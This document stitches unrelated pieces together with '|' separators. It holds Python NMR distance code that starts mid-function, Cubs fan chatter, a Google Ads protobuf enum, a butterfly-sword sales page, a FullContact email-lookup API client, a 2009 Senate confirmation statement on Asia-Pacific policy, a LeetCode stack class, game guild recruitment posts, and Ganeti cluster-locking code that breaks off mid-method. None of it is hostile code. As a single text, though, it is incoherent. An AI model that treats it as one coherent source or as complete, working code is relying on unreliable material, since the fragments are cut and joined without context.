atom1 = self.experimental_data[self.name]['atom1'][i]
resi2 = self.experimental_data[self.name]['resi2'][i]
atom2 = self.experimental_data[self.name]['atom2'][i]
# ---------------------------------
# If there is a "#" character indicating the ambiguity in atom1
# ---------------------------------
if '#' in atom1:
# ---------------------------------
# coordinate_1 is the average position of all possible atoms
# ---------------------------------
coordinate_1 = np.zeros(3, dtype = np.float32)
num = 0
for index in ['1', '2', '3', '4']:
if (resi1, atom1.replace('#', index)) in residue_number_atom_name:
coordinate_1 += coordinates[residue_number_atom_name[(resi1, atom1.replace('#', index))]]
num += 1.0
coordinate_1 /= num
else:
coordinate_1 = coordinates[
residue_number_atom_name[(resi1, atom1)]]
# ---------------------------------
# If there is a "#" character indicating the ambiguity in atom2
# ---------------------------------
if '#' in atom2:
# ---------------------------------
# coordinate_1 is the average position of all possible atoms
# ---------------------------------
coordinate_2 = np.zeros(3, dtype = np.float32)
num = 0
for index in ['1', '2', '3', '4']:
if (resi2, atom2.replace('#', index)) in residue_number_atom_name:
coordinate_2 += coordinates[residue_number_atom_name[(resi2, atom2.replace('#', index))]]
num += 1.0
coordinate_2 /= num
else:
coordinate_2 = coordinates[
residue_number_atom_name[(resi2, atom2)]]
# ---------------------------------
# Calculate the distance between the two coordinates and put on -6
# power
# ---------------------------------
pre_data[i] = distance2pre(np.linalg.norm(
coordinate_1 - coordinate_2))
#
print pdb_filename, ':', len(pre_data), 'distance information extracted'
#
return {'pre': pre_data}
### ==================================================================== ###
### ==================================================================== ###
### ==================================================================== ###
|
WGN radio.... TV will be next week.
Aramfan just texted me...she is at the game, so I'm sure we'll get a full report!
Day one of hopefully a long joyride is underway....buckle those seatbelts!
I've been waiting to put another bad postseason in the past, today is a good start!.
back to back singles with Sori and Theriot.... I like it And Reed with a Web-gem already! Gosh, I missed this!
I just turned on MLB network on TV to make sure the game isn't televised....and just in time to see DeRosa's at bat for the Indians. Oh how i love baseball! And the MLB network .
"W" .....Just 4 months late, I Know; Buzzkill! I'm heading into this season reeeeal slow,sorry-but this has been taking quite a toll on me & my 'ol heart.
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v8.errors",
marshal="google.ads.googleads.v8",
manifest={"FunctionParsingErrorEnum",},
)
class FunctionParsingErrorEnum(proto.Message):
r"""Container for enum describing possible function parsing
errors.
"""
class FunctionParsingError(proto.Enum):
r"""Enum describing possible function parsing errors."""
UNSPECIFIED = 0
UNKNOWN = 1
NO_MORE_INPUT = 2
EXPECTED_CHARACTER = 3
UNEXPECTED_SEPARATOR = 4
UNMATCHED_LEFT_BRACKET = 5
UNMATCHED_RIGHT_BRACKET = 6
TOO_MANY_NESTED_FUNCTIONS = 7
MISSING_RIGHT_HAND_OPERAND = 8
INVALID_OPERATOR_NAME = 9
FEED_ATTRIBUTE_OPERAND_ARGUMENT_NOT_INTEGER = 10
NO_OPERANDS = 11
TOO_MANY_OPERANDS = 12
__all__ = tuple(sorted(__protobuf__.manifest))
|
Sheath: You will get an embossed overseas-made heavy duty leather sheath for each knife, one with a left hand belt loop, the other right. Instead of snaps the retainer strip affixes to a prong. These are made of thick leather. Do not store swords in leather sheaths long term because the chemicals in leather can corrode/tarnish metal.
This is a pair of 2-in-1 Bowie style Butterfly Swords featuring a lenticular/convex grind on the outside and a chisel grind with Urasuki (a concavity) on the inside. This combination of grinds, done well as is the case here, are extraordinarily challenging. The plunge line curves gracefully to the choil and the spine features two scallops. The blade steel is your choice of Böhler 440C or D2 weapons-grade steel (the same kind of steel sold by knife supply houses to U.S. custom knife makers). They were designed by Jeffrey D. Modell of Modell Design LLC (using the Tomb Warrior D Guard Modell Design created for Everything Wing Chun) and made by Forgemaster K. Ali of Ironman Steel. Each blade has his personal logo.
These swords are serious weapons and consequently offered for sale as display swords only AND WE REALLY MEAN IT!
Each product consists of two knives, each with an upgraded heavy duty embossed leather sheath. We can also do a 2-in-1 sheath.
See the Limited Warranty/Legal section of this web-site prior to purchase! While these knives come with our standard warranty, we do not keep them in inventory because of the high cost of construction so they must be special ordered. That means if there is a warranty issue (hopefully not) you should expect a refund or accomodation rather than replacement.
PHOTOGRAPHS: Are of a prior pair with a different handle material than the Arizona Desert Ironwood we currently offer. Taken by us.
©2014 Modell Design LLC. All Rights Reserved. NB: The photographs on this web-site have been copyrighted. It is illegal to copy them. If you want a photo of them for your Butterfly Sword pin-up calender just ask.
|
import requests
import json
class FullContact(object):
def __init__(self, api_key):
self.api_key = api_key
self.url = url = "https://api.fullcontact.com/v2/person.json"
def get(self, **kwargs):
if 'apiKey' not in kwargs:
kwargs['apiKey'] = self.api_key
r = requests.get(self.url, params=kwargs)
return json.loads(r.text)
def change_keys(self,d):
modified_response={}
for keys in d:
key=keys[49:]
modified_response[key]=d[keys]
return modified_response
def post(self, email_list):
data_dict={}
counter=0
chunks=[]
person_url="https://api.fullcontact.com/v2/person.json?email="
for i in range(len(email_list)):
email_list[i]=person_url+email_list[i]
while counter<len(email_list):
chunks.append(email_list[counter:counter+20])
counter+=20
for request_urls in chunks:
post_data = json.dumps({'requests' : request_urls})
r = requests.post(
'https://api.fullcontact.com/v2/batch.json',
params={'apiKey': self.api_key},
headers={'content-type': 'application/json'},
data=post_data).json
json_data=json.loads(r.im_self.content)
modified_data = self.change_keys(json_data["responses"])
data_dict=dict(data_dict.items()+modified_data.items())
return data_dict
|
Chairman Webb, Members of the Foreign Relations Committee, it is an honor to appear before you today as President Obama's nominee to be the next Assistant Secretary of State for East Asian and Pacific Affairs.
I am honored and grateful to President Obama and to Secretary Clinton for placing their trust in me and nominating me to serve the United States of America in this position. I would like to both thank and introduce to the committee my family that is with me here today: my wife Lael Brainard, my three daughters Caelan, Ciara and Chloe, my father- and mother-in-law Albert and Joanne Brainard, and many other friends and family members who have come today to provide support. Particular thanks to Albert Brainard who served this nation with great distinction as a diplomat in Europe during the heights of the Cold War.
I've had the good fortune to see Asia from a variety of vantage points over the past 20 years. My first interactions in Asia were as a naval officer serving in Yokosuka, Japan and subsequently as an officer on the Joint Staff. As a treasury official in the early 1990s, I was fortunate to witness firsthand Asia's remarkable economic transformation from a region of developing countries to a critical driver of the global economy. Later, working at the National Security Council and at the Pentagon as the Deputy Assistant Secretary of Defense for Asia and the Pacific, I was able to gain a richer appreciation of the importance of American engagement to the security and stability of Asia. In my time outside of government I have had the chance to return to my roots as a professor and academic working on Asia-Pacific issues in the Washington, D.C. think-tank community and to work in the private sector in the most dynamic region on the globe. The last decade has allowed me to witness the dramatic rise of an increasingly integrated and highly innovative Asia – but nevertheless a region that still relies upon strong American leadership and sound judgment.
I've had the great privilege to work on Asia-Pacific issues for many years and it is a high honor to have the chance to continue to serve at a moment of enormous consequence and opportunity for the United States in Asia.
I approach my nomination with tremendous esteem for the State Department and its highly talented and capable corps of Foreign Service Officers, Civil Service employees, and Locally Engaged Staff, who represent America in Washington and around the world. If confirmed, I will call upon, and support, the first class team that the United States has in all its East Asia and Pacific posts and in the Department.
Mr. Chairman, as I seek your support, and the support of your colleagues, for my nomination, I am mindful of the depth and variety of your experience in Asia. Few are better versed than you in the complex history of the region and, perhaps more importantly, in the increasing criticality of our engagement with Asia. If confirmed, I commit to working closely with you and all the members of the subcommittee and their staffs on promoting a strong and vibrant American engagement in the region.
There should be no doubt that the United States itself is a Pacific nation, and in every regard -- geopolitically, militarily, diplomatically, and economically -- Asia and the Pacific are indispensible to addressing the challenges and seizing the opportunities of the 21st century.
Secretary Clinton's February trip to Asia underscored the Obama Administration's commitment to building even closer partnerships with the region and working with Asia on pressing regional and global issues. If confirmed, I plan to vigorously pursue enhanced engagement with Asia and the Pacific across the full range of bilateral and multilateral activities.
The elements of U.S. power -- hard and soft -- and American influence are broad and multi-faceted. Our stepped up engagement must be so as well. We have enormous opportunity to engage not only governments but also East Asian societies more intensively and creatively, with both traditional tools and new technologies. If confirmed, I will urge our diplomats to take every opportunity to reach out to the people of the Asia-Pacific region through a robust public diplomacy program.
Mr. Chairman, for the last half century, the United States and its allies in the region – Japan, the Republic of Korea, Australia, the Philippines, and Thailand – have maintained security and stability in East Asia and the Pacific. Our alliances remain the bedrock of our engagement in the region, and the Obama Administration is committed to strengthening those alliances to address both continuing and emerging challenges.
Japan is a cornerstone of our security policy in Asia. The May 2006 agreement on defense transformation and realignment will enhance deterrence while creating a more sustainable military presence in the region. The Guam International Agreement, signed by Secretary Clinton during her February trip, carries this transformation to the next stage. We are also working vigorously with our other critical ally in Northeast Asia, the Republic of Korea, to modernize our defense alliance and to achieve a partnership that is truly global and comprehensive in nature.
Japan and the Republic of Korea have been key partners in our joint efforts to maintain peace and stability in Northeast Asia and, in particular, to denuclearize North Korea through the Six-Party process. Recently this process has suffered serious setbacks, with North Korea stepping away from the denuclearization process and instead carrying out a series of provocations including its April 5 missile test and its May 25 announcement of a second nuclear test. As the President said, North Korea's actions blatantly defy U.N. Security Council resolutions and constitute a direct and reckless challenge to the international community, increasing tension and undermining stability in Northeast Asia. If confirmed, I would use close bilateral and trilateral coordination with Tokyo and Seoul to make clear that neither the United States nor its allies will accept a nuclear North Korea. We will also work closely with China in order to coordinate our policies on North Korea. And there should be no mistake: the United States is firm in its resolve to uphold its treaty commitments regarding the defense of its allies.
As we work together to ensure peace and security in the Asia-Pacific region, we must also continue to work with our regional friends and allies to tackle critical global challenges, including the security of Iraq, Afghanistan and Pakistan, energy security and climate change, development and disaster assistance, and responding to the global economic crisis through active leadership in multilateral organizations.
Australia is one of America's closest friends and allies. We work with Australia on almost every issue, and we are thankful for Australia's stalwart friendship, support and counsel. Our relations with New Zealand are the strongest they have been in many years as we work together on global and regional challenges from the Antarctic to Afghanistan. While the small size and populations of many Pacific Island countries make it seem sometimes they are overlooked, our ties are deep, and if confirmed, I look forward to the opportunity to strengthen those ties with our many friends in the Pacific.
One of our most urgent tasks is responding to the global economic crisis. It is worth highlighting that four Asian economies (China, Japan, the Republic of Korea, and Taiwan) are now among our top twelve trading partners. Today, the 21 APEC economies purchase some 60 percent of U.S. exports. The strong Asian representation in APEC, the WTO, and the G-20 reflects the increasing importance of Asian economies and their centrality in strengthening the multilateral trading system and recovering from the current financial and economic crisis. I am committed to close U.S. coordination with Asian economies to mitigate the downturn's impact on their economies and ours, and to spur regional and global economic recovery.
In this respect, Mr. Chairman, I would like to note the opportunities for expanded engagement that lie before us in Southeast Asia. Taken together, the ASEAN countries represent our second largest export market in Asia, at $68 billion, just less than China. ASEAN is the largest multi-country destination for private investment from the U.S., at $130 billion. As the countries in Southeast Asia integrate under the ASEAN Community, including the goal of creating a single market, we can expect the importance of our economic, political, educational and cultural ties with this dynamic and variegated part of East Asia to continue to grow.
The United States and ASEAN are now beginning our fourth decade as Dialogue Partners and ASEAN has just brought into force its new Charter, which provides a framework for much greater regional cooperation on economic, political, human rights and social issues. While the pace of ASEAN's evolution is unlikely to be dramatic, if we look at its changes over a period of several years, the picture is clearly one of increasing activity, relevance, and willingness to grapple with new challenges. The United States must match the changes underway in ASEAN and ASEAN member countries with renewed engagement which ensures continuation of a strong partnership.
Thailand and the Philippines stand as valued U.S. allies. The United States is working closely with the Government of the Philippines to overcome a persistent terrorist threat through an integrated effort to bolster military capabilities, improve institutions, and foster balanced, sustainable development. Our alliance with Thailand, a major non-NATO ally, provides a critical platform for projecting U.S. efforts in Southeast Asia and beyond. As the Thai people and their leaders struggle to emerge from recent internal tensions and grapple with how to strengthen democratic political institutions, they can count on the steadfast support and goodwill of the United States.
The Administration recently concluded three full days of discussions with Indonesian officials to define the contours of a Comprehensive Partnership that the President of Indonesia and Secretary Clinton called for, and Secretary Clinton met on Monday with Foreign Minister Wirajuda to discuss the partnership and other issues. Our relationship with Indonesia has expanded significantly in recent years, coincident with the growth of Indonesian democracy. It is entirely appropriate that the engagement between the world's second and third largest democracies has grown to embrace new areas of cooperation. The scope of an effective partnership can certainly extend beyond bilateral topics, as we join together to address regional and global issues such as protecting biodiversity, conservation of tropical forests and extensive coral reefs, improving global peace-keeping capabilities, intensified cooperation in science and education, and restoring balance and growth to the global economy.
Mr. Chairman, the people of Burma deserve better than what they now have. As Secretary Clinton said in Jakarta, neither our sanctions-based approach nor ASEAN's engagement approach have worked, so the Administration is reviewing policy options with the goal of finding more effective ways to encourage dialogue among the military, the opposition, and the ethnic nationalities, release of political prisoners, and broad-based reform. The recent actions by the Burmese Junta against Aung San Suu Kyi are deeply troubling and we are factoring these developments into our ongoing policy review. While I cannot prejudge the outcome of the policy review, I can say that my approach – if confirmed – will be to engage widely with Congress, with our partners in the region, and with people who know Burma in order to come up with practical, realistic ideas on how we can best encourage Burma to move in a more positive direction.
Last but certainly not least, I want to speak about our relationship with China. The U.S.-China relationship is complex, it is developing rapidly, and it is one of the most consequential of our bilateral relationships.
President Obama agreed with President Hu at the G-20 Summit in London that both the United States and China will seek to build a positive, cooperative and comprehensive relationship for the 21^st century. China's rise as an economic power and its growing political and diplomatic influence are developments with global and not merely regional ramifications. Our bilateral engagement with China cuts across a range and depth of issues that would have been unimaginable 20 years ago. We currently convene over 50 bilateral dialogues and working groups spanning subjects from aviation to non-proliferation to food safety.
If confirmed, I will carry out the Administration's objective to expand the cooperative aspects of the bilateral relationship in a way that parallels the complex and comprehensive nature of our engagement with China while further facilitating China's integration into the international system. In this respect, the ability to conduct frank and honest conversations about the difficult issues where we disagree will be an essential element of our approach. The American people expect us to continue the promotion of human rights and religious freedom in China. If confirmed, I will ensure that human rights, religious freedom for all China's citizens, and development of the rule of law and civil society remain strong pillars of our engagement. The situation in Tibet will remain a subject of engagement and concern.
Finally, I support the long-standing U.S. commitment to the one-China policy based on the three Communiqués and the Taiwan Relations Act, which have served to preserve peace and stability across the Strait for the last three decades. We are committed to making available to Taiwan the defense articles and services required for a sufficient self-defense. We welcome recent initiatives from both sides of the Taiwan Strait that have increased interaction and dialogue, and reduced tensions.
Mr. Chairman, let me close by reiterating my fundamental commitment, if confirmed, to do all in my power to ensure that the United States shapes trends in this dynamic region in ways that benefit both our own interests and those of the region as a whole. I strongly believe that close coordination between the executive and the legislative branches will be crucial to this endeavor, and if confirmed I look forward to close cooperation with you, Mr. Chairman, and your colleagues.
|
import collections
class MyStack(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self._queue = collections.deque()
def push(self, x):
"""
Push element x onto stack.
:type x: int
:rtype: void
"""
self._queue.append(x)
def pop(self):
"""
Removes the element on top of the stack and returns that element.
:rtype: int
"""
tempQueue = collections.deque()
while len(self._queue) > 1:
x = self._queue.popleft()
tempQueue.append(x)
result = self._queue.pop()
while len(tempQueue) > 0:
x = tempQueue.popleft()
self._queue.append(x)
return result
def top(self):
"""
Get the top element.
:rtype: int
"""
result = self.pop()
self._queue.append(result)
return result
def empty(self):
"""
Returns whether the stack is empty.
:rtype: bool
"""
return len(self._queue) == 0
# Your MyStack object will be instantiated and called as such:
# obj = MyStack()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.top()
# param_4 = obj.empty()
|
Welcome to Knights of Flame!
In KoF it is important to be active and do your best during events!
To apply send me a PM here on the forum or send a message to me (listrom) on Line!
See above how to apply.
PM me if you are interested and fulfill the requirements.
After a fun second Blitz war, lots of new epics for the guild from the beast chest and some more guild leveling we are approaching the max guild level. We currently have opened one new spot and I think we will open a second fairly soon.
If you want to be part of the great KoF community send me a PM and lets talk about it!
Hope to see you guys break into the top 10 for the big war!
It is all good Noir!
We currently have two spots open and are looking for active players.
If you want to join us in our quest for top 10 give us a shout!
PM kofteewin on Line for a chance to join a great guild like Knights of Flame!
We still have 2 spots open and going for top 10 next war. If you want an epic armor, message me on LINE chat @ kofteewin.
If you are looking for a spot in a friendly, social and strong guild for the fusion and other wars we have a spot for you!
Send me a PM here or see first post for line communication.
Looking to participate in a fun guild with high elemental bonuses and a very active community?
Knights of Flame currently have two spots open, PM me here on the forum or see further instructions how to apply in the initial post in this thread!
|
#
#
# Copyright (C) 2006, 2007, 2011, 2012 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Module implementing the logic behind the cluster operations
This module implements the logic for doing operations in the cluster. There
are two kinds of classes defined:
- logical units, which know how to deal with their specific opcode only
- the processor, which dispatches the opcodes to their logical units
"""
import sys
import logging
import random
import time
import itertools
import traceback
from ganeti import opcodes
from ganeti import opcodes_base
from ganeti import constants
from ganeti import errors
from ganeti import hooksmaster
from ganeti import cmdlib
from ganeti import locking
from ganeti import utils
from ganeti import compat
_OP_PREFIX = "Op"
_LU_PREFIX = "LU"
#: LU classes which don't need to acquire the node allocation lock
#: (L{locking.NAL}) when they acquire all node or node resource locks
_NODE_ALLOC_WHITELIST = frozenset([])
#: LU classes which don't need to acquire the node allocation lock
#: (L{locking.NAL}) in the same mode (shared/exclusive) as the node
#: or node resource locks
_NODE_ALLOC_MODE_WHITELIST = compat.UniqueFrozenset([
cmdlib.LUBackupExport,
cmdlib.LUBackupRemove,
cmdlib.LUOobCommand,
])
class LockAcquireTimeout(Exception):
"""Exception to report timeouts on acquiring locks.
"""
def _CalculateLockAttemptTimeouts():
"""Calculate timeouts for lock attempts.
"""
result = [constants.LOCK_ATTEMPTS_MINWAIT]
running_sum = result[0]
# Wait for a total of at least LOCK_ATTEMPTS_TIMEOUT before doing a
# blocking acquire
while running_sum < constants.LOCK_ATTEMPTS_TIMEOUT:
timeout = (result[-1] * 1.05) ** 1.25
# Cap max timeout. This gives other jobs a chance to run even if
# we're still trying to get our locks, before finally moving to a
# blocking acquire.
timeout = min(timeout, constants.LOCK_ATTEMPTS_MAXWAIT)
# And also cap the lower boundary for safety
timeout = max(timeout, constants.LOCK_ATTEMPTS_MINWAIT)
result.append(timeout)
running_sum += timeout
return result
class LockAttemptTimeoutStrategy(object):
"""Class with lock acquire timeout strategy.
"""
__slots__ = [
"_timeouts",
"_random_fn",
"_time_fn",
]
_TIMEOUT_PER_ATTEMPT = _CalculateLockAttemptTimeouts()
def __init__(self, _time_fn=time.time, _random_fn=random.random):
"""Initializes this class.
@param _time_fn: Time function for unittests
@param _random_fn: Random number generator for unittests
"""
object.__init__(self)
self._timeouts = iter(self._TIMEOUT_PER_ATTEMPT)
self._time_fn = _time_fn
self._random_fn = _random_fn
def NextAttempt(self):
"""Returns the timeout for the next attempt.
"""
try:
timeout = self._timeouts.next()
except StopIteration:
# No more timeouts, do blocking acquire
timeout = None
if timeout is not None:
# Add a small variation (-/+ 5%) to timeout. This helps in situations
# where two or more jobs are fighting for the same lock(s).
variation_range = timeout * 0.1
timeout += ((self._random_fn() * variation_range) -
(variation_range * 0.5))
return timeout
class OpExecCbBase: # pylint: disable=W0232
"""Base class for OpCode execution callbacks.
"""
def NotifyStart(self):
"""Called when we are about to execute the LU.
This function is called when we're about to start the lu's Exec() method,
that is, after we have acquired all locks.
"""
def Feedback(self, *args):
"""Sends feedback from the LU code to the end-user.
"""
def CurrentPriority(self): # pylint: disable=R0201
"""Returns current priority or C{None}.
"""
return None
def SubmitManyJobs(self, jobs):
"""Submits jobs for processing.
See L{jqueue.JobQueue.SubmitManyJobs}.
"""
raise NotImplementedError
def _LUNameForOpName(opname):
"""Computes the LU name for a given OpCode name.
"""
assert opname.startswith(_OP_PREFIX), \
"Invalid OpCode name, doesn't start with %s: %s" % (_OP_PREFIX, opname)
return _LU_PREFIX + opname[len(_OP_PREFIX):]
def _ComputeDispatchTable():
"""Computes the opcode-to-lu dispatch table.
"""
return dict((op, getattr(cmdlib, _LUNameForOpName(op.__name__)))
for op in opcodes.OP_MAPPING.values()
if op.WITH_LU)
def _SetBaseOpParams(src, defcomment, dst):
"""Copies basic opcode parameters.
@type src: L{opcodes.OpCode}
@param src: Source opcode
@type defcomment: string
@param defcomment: Comment to specify if not already given
@type dst: L{opcodes.OpCode}
@param dst: Destination opcode
"""
if hasattr(src, "debug_level"):
dst.debug_level = src.debug_level
if (getattr(dst, "priority", None) is None and
hasattr(src, "priority")):
dst.priority = src.priority
if not getattr(dst, opcodes_base.COMMENT_ATTR, None):
dst.comment = defcomment
def _ProcessResult(submit_fn, op, result):
"""Examines opcode result.
If necessary, additional processing on the result is done.
"""
if isinstance(result, cmdlib.ResultWithJobs):
# Copy basic parameters (e.g. priority)
map(compat.partial(_SetBaseOpParams, op,
"Submitted by %s" % op.OP_ID),
itertools.chain(*result.jobs))
# Submit jobs
job_submission = submit_fn(result.jobs)
# Build dictionary
result = result.other
assert constants.JOB_IDS_KEY not in result, \
"Key '%s' found in additional return values" % constants.JOB_IDS_KEY
result[constants.JOB_IDS_KEY] = job_submission
return result
def _FailingSubmitManyJobs(_):
"""Implementation of L{OpExecCbBase.SubmitManyJobs} to raise an exception.
"""
raise errors.ProgrammerError("Opcodes processed without callbacks (e.g."
" queries) can not submit jobs")
def _VerifyLocks(lu, glm, _mode_whitelist=_NODE_ALLOC_MODE_WHITELIST,
_nal_whitelist=_NODE_ALLOC_WHITELIST):
"""Performs consistency checks on locks acquired by a logical unit.
@type lu: L{cmdlib.LogicalUnit}
@param lu: Logical unit instance
@type glm: L{locking.GanetiLockManager}
@param glm: Lock manager
"""
if not __debug__:
return
have_nal = glm.check_owned(locking.LEVEL_NODE_ALLOC, locking.NAL)
for level in [locking.LEVEL_NODE, locking.LEVEL_NODE_RES]:
# TODO: Verify using actual lock mode, not using LU variables
if level in lu.needed_locks:
share_node_alloc = lu.share_locks[locking.LEVEL_NODE_ALLOC]
share_level = lu.share_locks[level]
if lu.__class__ in _mode_whitelist:
assert share_node_alloc != share_level, \
"LU is whitelisted to use different modes for node allocation lock"
else:
assert bool(share_node_alloc) == bool(share_level), \
("Node allocation lock must be acquired using the same mode as nodes"
" and node resources")
if lu.__class__ in _nal_whitelist:
assert not have_nal, \
"LU is whitelisted for not acquiring the node allocation lock"
elif lu.needed_locks[level] == locking.ALL_SET or glm.owning_all(level):
assert have_nal, \
("Node allocation lock must be used if an LU acquires all nodes"
" or node resources")
class Processor(object):
"""Object which runs OpCodes"""
DISPATCH_TABLE = _ComputeDispatchTable()
def __init__(self, context, ec_id, enable_locks=True):
"""Constructor for Processor
@type context: GanetiContext
@param context: global Ganeti context
@type ec_id: string
@param ec_id: execution context identifier
"""
self.context = context
self._ec_id = ec_id
self._cbs = None
self.rpc = context.rpc
self.hmclass = hooksmaster.HooksMaster
self._enable_locks = enable_locks
def _CheckLocksEnabled(self):
"""Checks if locking is enabled.
@raise errors.ProgrammerError: In case locking is not enabled
"""
if not self._enable_locks:
raise errors.ProgrammerError("Attempted to use disabled locks")
def _AcquireLocks(self, level, names, shared, opportunistic, timeout):
"""Acquires locks via the Ganeti lock manager.
@type level: int
@param level: Lock level
@type names: list or string
@param names: Lock names
@type shared: bool
@param shared: Whether the locks should be acquired in shared mode
@type opportunistic: bool
@param opportunistic: Whether to acquire opportunistically
@type timeout: None or float
@param timeout: Timeout for acquiring the locks
@raise LockAcquireTimeout: In case locks couldn't be acquired in specified
amount of time
"""
self._CheckLocksEnabled()
if self._cbs:
priority = self._cbs.CurrentPriority()
else:
priority = None
acquired = self.context.glm.acquire(level, names, shared=shared,
timeout=timeout, priority=priority,
opportunistic=opportunistic)
if acquired is None:
raise LockAcquireTimeout()
return acquired
def _ExecLU(self, lu):
"""Logical Unit execution sequence.
"""
write_count = self.context.cfg.write_count
lu.CheckPrereq()
hm = self.BuildHooksManager(lu)
h_results = hm.RunPhase(constants.HOOKS_PHASE_PRE)
lu.HooksCallBack(constants.HOOKS_PHASE_PRE, h_results,
self.Log, None)
if getattr(lu.op, "dry_run", False):
# in this mode, no post-hooks are run, and the config is not
# written (as it might have been modified by another LU, and we
# shouldn't do writeout on behalf of other threads
self.LogInfo("dry-run mode requested, not actually executing"
" the operation")
return lu.dry_run_result
if self._cbs:
submit_mj_fn = self._cbs.SubmitManyJobs
else:
submit_mj_fn = _FailingSubmitManyJobs
try:
result = _ProcessResult(submit_mj_fn, lu.op, lu.Exec(self.Log))
h_results = hm.RunPhase(constants.HOOKS_PHASE_POST)
result = lu.HooksCallBack(constants.HOOKS_PHASE_POST, h_results,
self.Log, result)
finally:
# FIXME: This needs locks if not lu_class.REQ_BGL
if write_count != self.context.cfg.write_count:
hm.RunConfigUpdate()
return result
def BuildHooksManager(self, lu):
return self.hmclass.BuildFromLu(lu.rpc.call_hooks_runner, lu)
def _LockAndExecLU(self, lu, level, calc_timeout):
"""Execute a Logical Unit, with the needed locks.
This is a recursive function that starts locking the given level, and
proceeds up, till there are no more locks to acquire. Then it executes the
given LU and its opcodes.
"""
glm = self.context.glm
adding_locks = level in lu.add_locks
acquiring_locks = level in lu.needed_locks
if level not in locking.LEVELS:
_VerifyLocks(lu, glm)
if self._cbs:
self._cbs.NotifyStart()
try:
result = self._ExecLU(lu)
except AssertionError, err:
# this is a bit ugly, as we don't know from which phase
# (prereq, exec) this comes; but it's better than an exception
# with no information
(_, _, tb) = sys.exc_info()
err_info = traceback.format_tb(tb)
del tb
logging.exception("Detected AssertionError")
raise errors.OpExecError("Internal assertion error: please report"
" this as a bug.\nError message: '%s';"
" location:\n%s" % (str(err), err_info[-1]))
elif adding_locks and acquiring_locks:
# We could both acquire and add locks at the same level, but for now we
# don't need this, so we'll avoid the complicated code needed.
raise NotImplementedError("Can't declare locks to acquire when adding"
" others")
elif adding_locks or acquiring_locks:
self._CheckLocksEnabled()
lu.DeclareLocks(level)
share = lu.share_locks[level]
opportunistic = lu.opportunistic_locks[level]
try:
assert adding_locks ^ acquiring_locks, \
"Locks must be either added or acquired"
if acquiring_locks:
# Acquiring locks
needed_locks = lu.needed_locks[level]
self._AcquireLocks(level, needed_locks, share, opportunistic,
calc_timeout())
else:
# Adding locks
add_locks = lu.add_locks[level]
lu.remove_locks[level] = add_locks
try:
glm.add(level, add_locks, acquired=1, shared=share)
except errors.LockError:
logging.exception("Detected lock error in level %s for locks"
" %s, shared=%s", level, add_locks, share)
raise errors.OpPrereqError(
"Couldn't add locks (%s), most likely because of another"
" job who added them first" % add_locks,
errors.ECODE_NOTUNIQUE)
try:
result = self._LockAndExecLU(lu, level + 1, calc_timeout)
finally:
if level in lu.remove_locks:
glm.remove(level, lu.remove_locks[level])
finally:
if glm.is_owned(level):
glm.release(level)
else:
result = self._LockAndExecLU(lu, level + 1, calc_timeout)
return result
# pylint: disable=R0201
def _CheckLUResult(self, op, result):
"""Check the LU result against the contract in the opcode.
"""
resultcheck_fn = op.OP_RESULT
if not (resultcheck_fn is None or resultcheck_fn(result)):
logging.error("Expected opcode result matching %s, got %s",
resultcheck_fn, result)
if not getattr(op, "dry_run", False):
# FIXME: LUs should still behave in dry_run mode, or
# alternately we should have OP_DRYRUN_RESULT; in the
# meantime, we simply skip the OP_RESULT check in dry-run mode
raise errors.OpResultError("Opcode result does not match %s: %s" %
(resultcheck_fn, utils.Truncate(result, 80)))
def ExecOpCode(self, op, cbs, timeout=None):
"""Execute an opcode.
@type op: an OpCode instance
@param op: the opcode to be executed
@type cbs: L{OpExecCbBase}
@param cbs: Runtime callbacks
@type timeout: float or None
@param timeout: Maximum time to acquire all locks, None for no timeout
@raise LockAcquireTimeout: In case locks couldn't be acquired in specified
amount of time
"""
if not isinstance(op, opcodes.OpCode):
raise errors.ProgrammerError("Non-opcode instance passed"
" to ExecOpcode (%s)" % type(op))
lu_class = self.DISPATCH_TABLE.get(op.__class__, None)
if lu_class is None:
raise errors.OpCodeUnknown("Unknown opcode")
if timeout is None:
calc_timeout = lambda: None
else:
calc_timeout = utils.RunningTimeout(timeout, False).Remaining
self._cbs = cbs
try:
if self._enable_locks:
# Acquire the Big Ganeti Lock exclusively if this LU requires it,
# and in a shared fashion otherwise (to prevent concurrent run with
# an exclusive LU.
self._AcquireLocks(locking.LEVEL_CLUSTER, locking.BGL,
not lu_class.REQ_BGL, False, calc_timeout())
elif lu_class.REQ_BGL:
raise errors.ProgrammerError("Opcode '%s' requires BGL, but locks are"
" disabled" % op.OP_ID)
try:
lu = lu_class(self, op, self.context, self.rpc)
lu.ExpandNames()
assert lu.needed_locks is not None, "needed_locks not set by LU"
try:
result = self._LockAndExecLU(lu, locking.LEVEL_CLUSTER + 1,
calc_timeout)
finally:
if self._ec_id:
self.context.cfg.DropECReservations(self._ec_id)
finally:
# Release BGL if owned
if self.context.glm.is_owned(locking.LEVEL_CLUSTER):
assert self._enable_locks
self.context.glm.release(locking.LEVEL_CLUSTER)
finally:
self._cbs = None
self._CheckLUResult(op, result)
return result
def Log(self, *args):
"""Forward call to feedback callback function.
"""
if self._cbs:
self._cbs.Feedback(*args)
def LogStep(self, current, total, message):
"""Log a change in LU execution progress.
"""
logging.debug("Step %d/%d %s", current, total, message)
self.Log("STEP %d/%d %s" % (current, total, message))
def LogWarning(self, message, *args, **kwargs):
"""Log a warning to the logs and the user.
The optional keyword argument is 'hint' and can be used to show a
hint to the user (presumably related to the warning). If the
message is empty, it will not be printed at all, allowing one to
show only a hint.
"""
